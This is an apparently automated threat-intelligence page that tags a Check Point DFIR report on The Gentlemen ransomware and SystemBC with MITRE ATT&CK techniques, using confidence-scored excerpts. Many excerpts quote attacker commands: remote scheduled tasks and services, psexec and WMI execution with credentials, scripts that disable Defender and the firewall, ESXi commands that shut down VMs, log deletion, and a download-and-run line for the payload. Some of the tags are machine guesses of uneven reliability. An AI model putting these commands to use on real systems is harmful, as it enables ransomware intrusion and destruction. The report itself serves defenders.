TTPwire Vol. 1 · MITRE ATT&CK-Tagged


Check Point Research

DFIR Report – The Gentlemen & SystemBC: A Sneak Peek Behind the Proxy

2026-04-20

ATT&CK techniques detected (111 predictions, technique, confidence, evidence snippet)

T1053.005 Scheduled Task (100%): “<hh:mm> /ru system schtasks /run /s <target> /tn updategs schtasks /create /s <target> /tn updategs2 /tr "c:\temp\<exe> <creds>" /sc once /st <hh:mm> /ru system schtasks /run /s <target> /tn updategs2 # services sc \\<target> cre…”
T1490 Inhibit System Recovery (100%): “, gif, mp3, nomedia, spl, cpl, adv, icl, msu. Among the excluded directories, the ransomware explicitly ignores and does not enumerate files under !Cynet Ransom Protection (Don't Delete), where Cynet likely places decoy files. By skipping this directory, the ransomware eff…”
T1486 Data Encrypted for Impact (100%): “…computes sharedsecret = X25519(attacker_privkey, ephemeralpubkey) using the attacker's own private key, and uses the first 24 bytes of sharedsecret2 as the ChaCha20 nonce. With the key and nonce recovered, it decrypts the encrypted files. The Gentlemen ESXi variant latest…”
T1486 Data Encrypted for Impact (100%): “meta: author = "@tera0017 / Check Point Research" description = "The Gentlemen ransomware written in Go." strings: $string1 = "silent mode (don't rename files)" ascii $string2 = "encrypt only mapped and unc network shares" ascii $string3 = "readme-gentlemen.…”
T1680 Local Storage Discovery (99%): “xml" -force if (!(test-path $gposcheduledpath)) { # path creation guard } $comps = get-adcomputer -filter * | select-object -expandproperty name foreach ($_ in $comps) { invoke-gpupdate -computer $_.name -randomdelayinminutes 0 -force -erroraction sile…”
T1053.005 Scheduled Task (99%): “action="C" name="$taskname" runAs="NT AUTHORITY\SYSTEM" logonType="S4U" />... <BootTrigger> <Enabled>true</Enabled> </BootTrigger> <RegistrationTrigger> <Enabled>true</Enabled> </RegistrationTrigger> <MultipleInstancesPolicy>ignore…”
T1053.005 Scheduled Task (99%): “\<host>\share$\<exe> <creds>" /sc once /st <hh:mm> schtasks /run /s <target> /tn updategu -- remote schtask: updategu2 (local temp) -- schtasks /create /s <target> /tn updategu2 /tr "c:\temp\<exe> <creds>" /sc once /st <hh…”
T1486 Data Encrypted for Impact (99%): “the desktop wallpaper. File encryption: before encryption begins, the ransomware checks whether the file size exceeds 0x100000 (1,048,576 bytes, or 1 MB). Files of 1 MB or smaller are routed to the small file function, while files larger than 1 MB are routed to the large file…”
T1053.005 Scheduled Task (99%): “…oscheduledpath = "\\$domain\sysvol\$domain\policies\{$guid}\machine\preferences\scheduledtasks" new-item -itemtype directory -path $gposcheduledpath -force | out-null $taskxmlpath = "$env:temp\scheduledtasks.xml" $tas…”
T1053.005 Scheduled Task (99%): “…e> -- wmi: run defender disable script -- wmic /node:<target> process call create "<defender_script_a>" -- wmi: run via share path -- wmic /node:<target> process call create "\\<host>\share$\<exe> <creds>" -- wmi: run via local…”
T1135 Network Share Discovery (98%): “object { $_.name -like ':\' } | select-object -expandproperty name; try { $volumes += get-clustersharedvolume | foreach-object { $_.sharedvolumeinfo.friendlyvolumename } } catch { } $volumes" Network enumeration: in order to enumerate network drives the rans…”
T1021.002 SMB/Windows Admin Shares (98%): “harvested from the environment. These credentials are then reused across all lateral movement operations: PsExec receives them via the -u and -p parameters, WMI uses them for remote authentication, and remote scheduled task and service creation, authenticating with them agains…”
T1059.001 PowerShell (98%): “system\currentcontrolset\control\lsa' /v restrictanonymous /t reg_dword /d 0 /f 2>$null" -- remote powershell: script_c — winrm defender disable + process exclusion (with creds) -- powershell -noprofile -executionpolicy bypass -command "invoke-…”
T1489 Service Stop (98%): “--system --fast example 3: --password qwerty --shares --t 10 example 4: --password qwerty --full --ultrafast example 5: --password qwerty --full --spread "domain\admin:p@ss" # with credentials example 6: --password qwerty --t 10 --keep-…”
T1053.005 Scheduled Task (97%): “a stop signal to the service right now, killing it immediately if it's currently running. sc stop <service>, sends a stop signal to the service right now, killing it immediately if it's currently running. Persistence: during execution, the ransomware attempts to establish pe…”
T1486 Data Encrypted for Impact (97%): “about victims, likely to increase pressure on them to pay. To date, the group has publicly claimed a little over 320 victims, with the majority of infections occurring in 2026. This growth in activity suggests that The Gentlemen RaaS program has managed to attract a significant n…”
T1053.005 Scheduled Task (97%): “system (HKLM) and for the current user (HKCU): reg add hkcu\software\microsoft\windows\currentversion\run /v gupdateu /t reg_sz /d "<exe>" /f When the --spread argument is enabled, the ransomware also attempts to maintain remote persistence on…”
T1486 Data Encrypted for Impact (97%): “, state.tgz, useropts.gz Conclusion: the activity surrounding The Gentlemen RaaS underscores how quickly a well-designed affiliate program can evolve from newcomer to a high-impact ecosystem player. By combining a versatile, multi-platform locker set with built-in latera…”
T1219 Remote Access Tools (96%): “\system\currentcontrolset\control\terminal server /v fdenytsconnections /t reg_dword /d 0 /f cmd.exe /c netsh advfirewall firewall set rule group="remote desktop" new enable=yes Later, the attacker installed and configured AnyDesk using: cmd.exe /c a…”
T1486 Data Encrypted for Impact (96%): “first 24 bytes of the shared secret (derived with the attacker's public key) are used as the nonce. For small files (less than 1MB) the contents are encrypted using XChaCha20, a stream cipher, which XORs the plaintext with a keystream to produce ciphertext of identical leng…”
T1053.005 Scheduled Task (96%): “<target> /tn updategs /tr "\\<host>\share$\<exe> <creds>" /sc once /st <hh:mm> /ru system schtasks /run /s <target> /tn updategs -- remote schtask: updategs2 (system, local temp) -- schtasks /create /s <target> /tn updategs2 /tr "…”
T1486 Data Encrypted for Impact (95%): “cl application wevtutil cl security del /f /q c:\windows\prefetch\*.* del /f /q c:\programdata\microsoft\windows defender\support\*.* del /f /q %systemroot%\system32\logfiles\rdp*\*.* Free space wiping: when the threat…”
T1059.001 PowerShell (95%): “_e — winrm start process via share with args (with creds, 96-char template) -- powershell -noprofile -executionpolicy bypass -command "invoke-command -computername <target> -scriptblock { start-process -filepath '<\\<host>\share$\<exe>>' …”
T1059.012 Hypervisor CLI (95%): “…ms (popen, output parsed line by line) vim-cmd vmsvc/getallvms | tail -n +2 # power off each VM gracefully (one system() call per VM, skipping --ignore list) vim-cmd vmsvc/power.off <vmid> >/dev/null 2>&1 # after 8-second sleep: enumerate still-…”
T1090.002 External Proxy (95%): “are fake and may be set up by third parties. Only use the methods listed in this note or on the specified website. MITRE ATT&CK matrix. The post DFIR Report – The Gentlemen & SystemBC: A Sneak Peek Behind the Proxy appeared first on Check Point Research.”
T1486 Data Encrypted for Impact (94%): “execution via ADMIN$ shares, and rapid expansion across endpoints. This was accompanied by attempted and successful command-and-control establishment using infrastructure such as 45.86.230[.]112 and 91.107.247[.]163, staged malware delivery from the internal DC, an…”
T1486 Data Encrypted for Impact (93%): “…wallrule then loads dynamically mpr.dll and by using the Windows API functions enumerates the network shares: WNetOpenEnumW WNetEnumResourceW WNetCloseEnum Directories, filenames and extensions exclusion: as with many other ransomware families, this one also excludes specific…”
T1059.012 Hypervisor CLI (93%): “-path $path(s) VM & processes termination: ransomware operators shut down virtual machines on an ESXi host to make their attack more effective and efficient. By powering off the VMs, they release locks on virtual disk files, allowing those files to be encrypted more reliably…”
T1564.006 Run Virtual Instance (92%): “/dev/null Pre-encryption preparation: the ransomware modifies a VMware ESXi host to prepare the storage layer for fast, consistent disk writes and then disables automatic VM recovery. It increases the VMFS write buffer capacity and adjusts the flush interval to control how da…”
T1486 Data Encrypted for Impact (88%): “/www.torproject.org/download/> Follow us on X: hxxps://x.com/thegentlemen25 Any other means of communication are fake and may be set up by third parties. Only use the methods listed in this note or on the specified website. After adding (us) in Tox or Session, pl…”
T1486 Data Encrypted for Impact (87%): “--path dir target directories, comma-separated (required) example: --path /vmfs/ example2: --path "/vmfs/,/datastore/,/mnt/storage" --ignore vms VM display names to ignore, comma-separated (optional) example: --ignore domaincontroller example2: -…”
T1486 Data Encrypted for Impact (86%): “/dev/null Pre-encryption preparation: the ransomware modifies a VMware ESXi host to prepare the storage layer for fast, consistent disk writes and then disables automatic VM recovery. It increases the VMFS write buffer capacity and adjusts the flush interval to control how da…”
T1486 Data Encrypted for Impact (86%): “the Go programming language. It appears to be under active development, with new features and capabilities being continuously added over time. Command line arguments: The Gentlemen ransomware exposes a wide range of command-line options that provide numerous features to its oper…”
T1679 Selective Exclusion (86%): “program files\\windows", "c:\\program files (x86)\\windows", "c:\\program files\\intel", "tor browser", "boot", "config.msi", "google", "system32", "perflogs", "appdata", "windows.old" Excluded extensions: hemepack, n…”
T1053.005 Scheduled Task (86%): “capabilities. On one compromised host, it staged the tool socks.exe – identified as a variant of SystemBC – was executed and attempted to communicate with 45.86.230[.]112, followed by validation using cmd.exe /c tasklist | findstr /i socks. This tool is commonly used to…”
T1679 Selective Exclusion (85%): “…wallrule then loads dynamically mpr.dll and by using the Windows API functions enumerates the network shares: WNetOpenEnumW WNetEnumResourceW WNetCloseEnum Directories, filenames and extensions exclusion: as with many other ransomware families, this one also excludes specific…”
T1490 Inhibit System Recovery (85%): “cl application wevtutil cl security del /f /q c:\windows\prefetch\*.* del /f /q c:\programdata\microsoft\windows defender\support\*.* del /f /q %systemroot%\system32\logfiles\rdp*\*.* Free space wiping: when the threat…”
T1059.001 PowerShell (82%): “http://[redacted_domain_controller]:8080/grand.exe', 'c:\programdata\r.exe'); c:\programdata\r.exe --password vvo8etuh --spread [redacted_domain]\[redacted_user]:[redacted_password] This command downloaded grand.exe (…”
T1673 Virtual Machine Discovery (82%): “-path $path(s) VM & processes termination: ransomware operators shut down virtual machines on an ESXi host to make their attack more effective and efficient. By powering off the VMs, they release locks on virtual disk files, allowing those files to be encrypted more reliably…”
T1080 Taint Shared Content (81%): “execution via ADMIN$ shares, and rapid expansion across endpoints. This was accompanied by attempted and successful command-and-control establishment using infrastructure such as 45.86.230[.]112 and 91.107.247[.]163, staged malware delivery from the internal DC, an…”
T1486 Data Encrypted for Impact (80%): “570 victims, with the majority located in the United States, followed by the United Kingdom and Germany. Whether SystemBC is directly integrated into The Gentlemen ransomware ecosystem or is simply a tool leveraged by this particular affiliate for exfiltration and remote access r…”
T1021.002 SMB/Windows Admin Shares (79%): “c/h/r/k -- psexec: disable defender on target (with credentials) -- psexec \\<target> -accepteula -d -s -u <domain\user> -p <pass> cmd /c <defender_script_a> -- psexec: disable defender on target (no credentials) -- psexec \\<tar…”
T1679 Selective Exclusion (79%): “full command lines for the --spread argument are provided further below. Antivirus evasion: the ransomware executes three PowerShell commands to disable Microsoft Defender protection and exclude both itself and the entire c:\ drive from scanning and monitoring: powershell -…”
T1486 Data Encrypted for Impact (78%): “DFIR Report – The Gentlemen & SystemBC: A Sneak Peek Behind the Proxy. Key points: The Gentlemen ransomware-as-a-service (RaaS) program is rapidly gaining popularity, attracting numerous affiliates and publicly claiming over 320 victims, with the majority of attacks (240…”
T1486 Data Encrypted for Impact (77%): “encrypt only mapped network drives and available UNC shares in session context (optional) --full two-phase: --system + --shares. best practice. (optional) additional flags --spread creds lateral movement: "domain/user:pass" with creds, or "" for current ses…”
T1585.001 Social Media Accounts (77%): “is a relatively new group that emerged around mid-2025. The operators advertise their services across multiple underground forums, promoting their ransomware platform and inviting penetration testers (and other technically skilled actors) to join as affiliates. The RaaS provi…”
T1486 Data Encrypted for Impact (77%): “inf, bootmgr, hiberfil.sys, bootmgr.efi, bootmgfw.efi, #recycle, readme-gentlemen.txt "c:\\windows", "system volume information", "c:\\intel", "admin$", "ipc$", "!cynet ransom protection (don't delete)", "sysvol", "netlogon", "$w…”
T1027.013 Encrypted/Encoded File (76%): “encryption, the function appends a footer to the file containing the string --eph--, followed by the base64-encoded ephemeral public key and a newline. This is followed by a marker section --marker--gentlemen\n and a final gentlemen sentinel. The stored ephemeral p…”
T1078 Valid Accounts (74%): “570 victims, with the majority located in the United States, followed by the United Kingdom and Germany. Whether SystemBC is directly integrated into The Gentlemen ransomware ecosystem or is simply a tool leveraged by this particular affiliate for exfiltration and remote access r…”
T1027 Obfuscated Files or Information (74%): “encryption, the function appends a footer to the file containing the string --eph--, followed by the base64-encoded ephemeral public key and a newline. This is followed by a marker section --marker--gentlemen\n and a final gentlemen sentinel. The stored ephemeral p…”
T1686.003 Windows Host Firewall (74%): “executable. During lateral movement, the ransomware makes an attempt to blind Windows Defender on each reachable remote host by pushing a PowerShell script that disables real-time monitoring, adds broad exclusions for the drive, staging share, and its own process, shuts down th…”
T1505.004 IIS Components (73%): “capabilities. On one compromised host, it staged the tool socks.exe – identified as a variant of SystemBC – was executed and attempted to communicate with 45.86.230[.]112, followed by validation using cmd.exe /c tasklist | findstr /i socks. This tool is commonly used to…”
T1090.002 External Proxy (72%): “…2cba43a1af6d965432ae11487726db84d2945cf2cd975d7774b76b54af052418ac2e59ada69 Download Tox messenger: <https://tox.chat/download.html> Contact us (add via Session ID): {session_id} Download Session <https://getsession.org> Сontact to prevent data leak (7…”
T1053.005 Scheduled Task (71%): “…voke-command -computername <target> -scriptblock { start-process -filepath 'c:\temp\<exe>' -argumentlist '<creds>' }" script_a (defender disable — used inline by psexec and wmi calls) -------------------------------…”
T1053.003 Cron (71%): “/dev/null && chmod +x '/bin/.vmware-authd' then creates a script file that ESXi runs at boot. mkdir -p /etc/rc.local.d 2>/dev/null; \ echo '#!/bin/sh' > '/etc/rc.local.d/local.sh'; \ echo 'sleep 30 && /bin/.vmware-authd <origin…”
T1112 Modify Registry (70%): “executable. During lateral movement, the ransomware makes an attempt to blind Windows Defender on each reachable remote host by pushing a PowerShell script that disables real-time monitoring, adds broad exclusions for the drive, staging share, and its own process, shuts down th…”
T1486 Data Encrypted for Impact (70%): “is a relatively new group that emerged around mid-2025. The operators advertise their services across multiple underground forums, promoting their ransomware platform and inviting penetration testers (and other technically skilled actors) to join as affiliates. The RaaS provi…”
T1486 Data Encrypted for Impact (68%): “http://[redacted_domain_controller]:8080/grand.exe', 'c:\programdata\r.exe'); c:\programdata\r.exe --password vvo8etuh --spread [redacted_domain]\[redacted_user]:[redacted_password] This command downloaded grand.exe (…”
T1005 Data from Local System (67%): “can provide three sample files, and we will restore them free of charge. Tox contact - recover your files. Contact us (add via Tox ID): d527959a7bc728cb272a0db683b547f079c98012201a48dd2792b84604e8bc29f6e6bdb8003f Download Tox messenger: <https://tox.chat/download.html…”
T1055.001 Dynamic-link Library Injection (66%): “http://[redacted_domain_controller]:8080/grand.exe', 'c:\programdata\r.exe'); c:\programdata\r.exe --password vvo8etuh --spread [redacted_domain]\[redacted_user]:[redacted_password] This command downloaded grand.exe (…”
T1482 Domain Trust Discovery (66%): “mechanism after the SystemBC attempt was blocked. Credential access and continued discovery: compromised hosts were also used for credential harvesting. Mimikatz output recovered from memory on one of the compromised endpoints showed access to credential material, including domain…”
T1219.002 Remote Desktop Software (65%): “\system\currentcontrolset\control\terminal server /v fdenytsconnections /t reg_dword /d 0 /f cmd.exe /c netsh advfirewall firewall set rule group="remote desktop" new enable=yes Later, the attacker installed and configured AnyDesk using: cmd.exe /c a…”
T1080 Taint Shared Content (64%): “about victims, likely to increase pressure on them to pay. To date, the group has publicly claimed a little over 320 victims, with the majority of infections occurring in 2026. This growth in activity suggests that The Gentlemen RaaS program has managed to attract a significant n…”
T1550.002 Pass the Hash (63%): “mechanism after the SystemBC attempt was blocked. Credential access and continued discovery: compromised hosts were also used for credential harvesting. Mimikatz output recovered from memory on one of the compromised endpoints showed access to credential material, including domain…”
T1021.002 SMB/Windows Admin Shares (63%): “…d /c net share share$=c:\temp /grant:everyone,full cmd /c icacls c:\temp /grant "anonymous logon":f cmd /c reg add hklm\system\currentcontrolset\services\lanmanserver\parameters /v nullsessionshares /t reg_multi_sz /d share$…”
T1059.012 Hypervisor CLI (62%): “…mkfstools -u $i/eztdisk >/dev/null 2>&1; \ done 2>&1 # clear ESXi VM autostart configuration (prevents VMs from restarting) vim-cmd hostsvc/autostartmanager/clear_autostart >/dev/null 2>&1 # disable autostart manager entirely vim-cmd hostsvc…”
T1585 Establish Accounts (62%): “DFIR Report – The Gentlemen & SystemBC: A Sneak Peek Behind the Proxy. Key points: The Gentlemen ransomware-as-a-service (RaaS) program is rapidly gaining popularity, attracting numerous affiliates and publicly claiming over 320 victims, with the majority of attacks (240…”
T1564.006 Run Virtual Instance (60%): “…mkfstools -u $i/eztdisk >/dev/null 2>&1; \ done 2>&1 # clear ESXi VM autostart configuration (prevents VMs from restarting) vim-cmd hostsvc/autostartmanager/clear_autostart >/dev/null 2>&1 # disable autostart manager entirely vim-cmd hostsvc…”
T1059.003 Windows Command Shell (60%): “shares such as \\[redacted_hostname]\admin$\<random_7_char>.exe and executing them via RPC. The first observed deployment occurred on an internal endpoint, after which similar activity appeared across additional hosts. Early post-compromise actions inc…”
T1486 Data Encrypted for Impact (59%): “--system --fast example 3: --password qwerty --shares --t 10 example 4: --password qwerty --full --ultrafast example 5: --password qwerty --full --spread "domain\admin:p@ss" # with credentials example 6: --password qwerty --t 10 --keep-…”
T1003 OS Credential Dumping (57%): “mechanism after the SystemBC attempt was blocked. Credential access and continued discovery: compromised hosts were also used for credential harvesting. Mimikatz output recovered from memory on one of the compromised endpoints showed access to credential material, including domain…”
T1021.001 Remote Desktop Protocol (57%): “shares such as \\[redacted_hostname]\admin$\<random_7_char>.exe and executing them via RPC. The first observed deployment occurred on an internal endpoint, after which similar activity appeared across additional hosts. Early post-compromise actions inc…”
T1059.012 Hypervisor CLI (55%): “/dev/null && chmod +x '/bin/.vmware-authd' then creates a script file that ESXi runs at boot. mkdir -p /etc/rc.local.d 2>/dev/null; \ echo '#!/bin/sh' > '/etc/rc.local.d/local.sh'; \ echo 'sleep 30 && /bin/.vmware-authd <origin…”
T1080 Taint Shared Content (54%): “, state.tgz, useropts.gz Conclusion: the activity surrounding The Gentlemen RaaS underscores how quickly a well-designed affiliate program can evolve from newcomer to a high-impact ecosystem player. By combining a versatile, multi-platform locker set with built-in latera…”
T1486 Data Encrypted for Impact (53%): “…mkfstools -u $i/eztdisk >/dev/null 2>&1; \ done 2>&1 # clear ESXi VM autostart configuration (prevents VMs from restarting) vim-cmd hostsvc/autostartmanager/clear_autostart >/dev/null 2>&1 # disable autostart manager entirely vim-cmd hostsvc…”
T1090.001 Internal Proxy (51%): “capabilities. On one compromised host, it staged the tool socks.exe – identified as a variant of SystemBC – was executed and attempted to communicate with 45.86.230[.]112, followed by validation using cmd.exe /c tasklist | findstr /i socks. This tool is commonly used to…”
T1675 ESXi Administration Command (50%): “-path $path(s) VM & processes termination: ransomware operators shut down virtual machines on an ESXi host to make their attack more effective and efficient. By powering off the VMs, they release locks on virtual disk files, allowing those files to be encrypted more reliably…”
T1484.001 Group Policy Modification (49%): “netfirewallprofile -profile domain,public,private -enabled false; enable-windowsoptionalfeature -online -featurename smb1protocol -norestart 2>$null; reg add hklm\system\currentcontrolset\control\lsa /v everyoneincludesanonymous /t reg_dword /d…”
T1685 Disable or Modify Tools (48%): “executable. During lateral movement, the ransomware makes an attempt to blind Windows Defender on each reachable remote host by pushing a PowerShell script that disables real-time monitoring, adds broad exclusions for the drive, staging share, and its own process, shuts down th…”
T1059.001 PowerShell (48%): “…voke-command -computername <target> -scriptblock { start-process -filepath 'c:\temp\<exe>' -argumentlist '<creds>' }" script_a (defender disable — used inline by psexec and wmi calls) -------------------------------…”
T1053.005 Scheduled Task (47%): “set-mppreference -disablerealtimemonitoring $true -force This disabled Windows Defender real-time monitoring. The same payload, identified by a consistent hash, then appeared across numerous systems under different filenames, including c:\programdata\r.exe, c:\…”
T1675 ESXi Administration Command (47%): “…ms (popen, output parsed line by line) vim-cmd vmsvc/getallvms | tail -n +2 # power off each VM gracefully (one system() call per VM, skipping --ignore list) vim-cmd vmsvc/power.off <vmid> >/dev/null 2>&1 # after 8-second sleep: enumerate still-…”
T1059.001 PowerShell (47%): “="\\<host>\share$\<exe> <creds>" sc \\<target> start updatesvc -- remote service: updatesvc2 (local temp) -- sc \\<target> create updatesvc2 binpath="c:\temp\<exe> <creds>" sc \\<target> start updatesvc2 -- re…”
T1673 Virtual Machine Discovery (46%): “…ms (popen, output parsed line by line) vim-cmd vmsvc/getallvms | tail -n +2 # power off each VM gracefully (one system() call per VM, skipping --ignore list) vim-cmd vmsvc/power.off <vmid> >/dev/null 2>&1 # after 8-second sleep: enumerate still-…”
T1090.002 External Proxy (46%): “capabilities. On one compromised host, it staged the tool socks.exe – identified as a variant of SystemBC – was executed and attempted to communicate with 45.86.230[.]112, followed by validation using cmd.exe /c tasklist | findstr /i socks. This tool is commonly used to…”
T1679 Selective Exclusion (46%): “--path dir target directories, comma-separated (required) example: --path /vmfs/ example2: --path "/vmfs/,/datastore/,/mnt/storage" --ignore vms VM display names to ignore, comma-separated (optional) example: --ignore domaincontroller example2: -…”
T1070.004 File Deletion (45%): “inf, bootmgr, hiberfil.sys, bootmgr.efi, bootmgfw.efi, #recycle, readme-gentlemen.txt "c:\\windows", "system volume information", "c:\\intel", "admin$", "ipc$", "!cynet ransom protection (don't delete)", "sysvol", "netlogon", "$w…”
T1585.002 Email Accounts (44%): “is a relatively new group that emerged around mid-2025. The operators advertise their services across multiple underground forums, promoting their ransomware platform and inviting penetration testers (and other technically skilled actors) to join as affiliates. The RaaS provi…”
T1485 Data Destruction (43%): “inf, bootmgr, hiberfil.sys, bootmgr.efi, bootmgfw.efi, #recycle, readme-gentlemen.txt "c:\\windows", "system volume information", "c:\\intel", "admin$", "ipc$", "!cynet ransom protection (don't delete)", "sysvol", "netlogon", "$w…”
T1559.001 Component Object Model (39%): “capabilities. On one compromised host, it staged the tool socks.exe – identified as a variant of SystemBC – was executed and attempted to communicate with 45.86.230[.]112, followed by validation using cmd.exe /c tasklist | findstr /i socks. This tool is commonly used to…”
T1059.012 Hypervisor CLI (39%): “/dev/null Pre-encryption preparation: the ransomware modifies a VMware ESXi host to prepare the storage layer for fast, consistent disk writes and then disables automatic VM recovery. It increases the VMFS write buffer capacity and adjusts the flush interval to control how da…”
T1588.001 Malware (38%): “DFIR Report – The Gentlemen & SystemBC: A Sneak Peek Behind the Proxy. Key points: The Gentlemen ransomware-as-a-service (RaaS) program is rapidly gaining popularity, attracting numerous affiliates and publicly claiming over 320 victims, with the majority of attacks (240…”
T1053 Scheduled Task/Job (37%): “a stop signal to the service right now, killing it immediately if it's currently running. sc stop <service>, sends a stop signal to the service right now, killing it immediately if it's currently running. Persistence: during execution, the ransomware attempts to establish pe…”
T1564.006 Run Virtual Instance (37%): “cl application wevtutil cl security del /f /q c:\windows\prefetch\*.* del /f /q c:\programdata\microsoft\windows defender\support\*.* del /f /q %systemroot%\system32\logfiles\rdp*\*.* Free space wiping: when the threat…”
T1053.005 Scheduled Task (37%): “full command lines for the --spread argument are provided further below. Antivirus evasion: the ransomware executes three PowerShell commands to disable Microsoft Defender protection and exclude both itself and the entire c:\ drive from scanning and monitoring: powershell -…”
T1021.002 SMB/Windows Admin Shares (36%): “\lsa /v everyoneincludesanonymous /t reg_dword /d 1 /f reg add...\lsa /v restrictanonymous /t reg_dword /d 0 /f Windows firewall: the ransomware tries to disable the firewall to allow unrestricted outbound and inbound traffic. This enables lateral movement tools (…”
T1486 Data Encrypted for Impact (36%): “full command lines for the --spread argument are provided further below. Antivirus evasion: the ransomware executes three PowerShell commands to disable Microsoft Defender protection and exclude both itself and the entire c:\ drive from scanning and monitoring: powershell -…”
T1059.001 PowerShell (36%): “full command lines for the --spread argument are provided further below. Antivirus evasion: the ransomware executes three PowerShell commands to disable Microsoft Defender protection and exclude both itself and the entire c:\ drive from scanning and monitoring: powershell -…”
T1078.002 Domain Accounts (35%): “570 victims, with the majority located in the United States, followed by the United Kingdom and Germany. Whether SystemBC is directly integrated into The Gentlemen ransomware ecosystem or is simply a tool leveraged by this particular affiliate for exfiltration and remote access r…”
T1588.001 Malware (35%): “, state.tgz, useropts.gz Conclusion: the activity surrounding The Gentlemen RaaS underscores how quickly a well-designed affiliate program can evolve from newcomer to a high-impact ecosystem player. By combining a versatile, multi-platform locker set with built-in latera…”
T1564.006 Run Virtual Instance (35%): “vmfs-5 datastore (forces buffer flush before encryption — ensures plaintext is written to disk) for i in $(esxcli storage filesystem list | grep 'vmfs-5' | awk '{print $1}'); do \ vmkfstools -c 10m -d eagerzeroedthick $i/eztdisk >/dev/null 2>&1; \…”
T1021.001 Remote Desktop Protocol (33%): “set-mppreference -disablerealtimemonitoring $true -force This disabled Windows Defender real-time monitoring. The same payload, identified by a consistent hash, then appeared across numerous systems under different filenames, including c:\programdata\r.exe, c:\…”
T1585 Establish Accounts (33%): “, state.tgz, useropts.gz Conclusion: the activity surrounding The Gentlemen RaaS underscores how quickly a well-designed affiliate program can evolve from newcomer to a high-impact ecosystem player. By combining a versatile, multi-platform locker set with built-in latera…”
T1486 Data Encrypted for Impact (32%): “, gif, mp3, nomedia, spl, cpl, adv, icl, msu. Among the excluded directories, the ransomware explicitly ignores and does not enumerate files under !Cynet Ransom Protection (Don't Delete), where Cynet likely places decoy files. By skipping this directory, the ransomware eff…”
T1564.012 File/Path Exclusions (32%): “full command lines for the --spread argument are provided further below. Antivirus evasion: the ransomware executes three PowerShell commands to disable Microsoft Defender protection and exclude both itself and the entire c:\ drive from scanning and monitoring: powershell -…”
T1569.002 Service Execution (32%): “c/h/r/k -- psexec: disable defender on target (with credentials) -- psexec \\<target> -accepteula -d -s -u <domain\user> -p <pass> cmd /c <defender_script_a> -- psexec: disable defender on target (no credentials) -- psexec \\<tar…”
T1491.001 Internal Defacement (31%): “cl application wevtutil cl security del /f /q c:\windows\prefetch\*.* del /f /q c:\programdata\microsoft\windows defender\support\*.* del /f /q %systemroot%\system32\logfiles\rdp*\*.* Free space wiping: when the threat…”
T1547.001 Registry Run Keys / Startup Folder (31%): “a stop signal to the service right now, killing it immediately if it's currently running. sc stop <service>, sends a stop signal to the service right now, killing it immediately if it's currently running. Persistence: during execution, the ransomware attempts to establish pe…”
T1059.001 PowerShell (31%): “executable. During lateral movement, the ransomware makes an attempt to blind Windows Defender on each reachable remote host by pushing a PowerShell script that disables real-time monitoring, adds broad exclusions for the drive, staging share, and its own process, shuts down th…”
T1021.002 SMB/Windows Admin Shares (31%): “…process '<exe>'; set-netfirewallprofile -profile domain,public,private -enabled false; get-psdrive -psprovider filesystem | where-object { $_.name -match '^[a-z]$' } | foreach-object { $d = $_.name; net share ($d + '$') = ($d + ':\'…”
T1080 Taint Shared Content (30%): “http://[redacted_domain_controller]:8080/grand.exe', 'c:\programdata\r.exe'); c:\programdata\r.exe --password vvo8etuh --spread [redacted_domain]\[redacted_user]:[redacted_password] This command downloaded grand.exe (…”

Summary

Key Points. The Gentlemen RaaS. The Gentlemen ransomware-as-a-service (RaaS) operation is a relatively new group that emerged around mid-2025. The operators advertise their services across multiple underground forums, promoting their ransomware platform and inviting penetration testers (and other technically skilled actors) to join as affiliates. The RaaS provides affiliates with multi-OS lockers for Windows, Linux, […]

The post DFIR Report – The Gentlemen & SystemBC: A Sneak Peek Behind the Proxy appeared first on Check Point Research.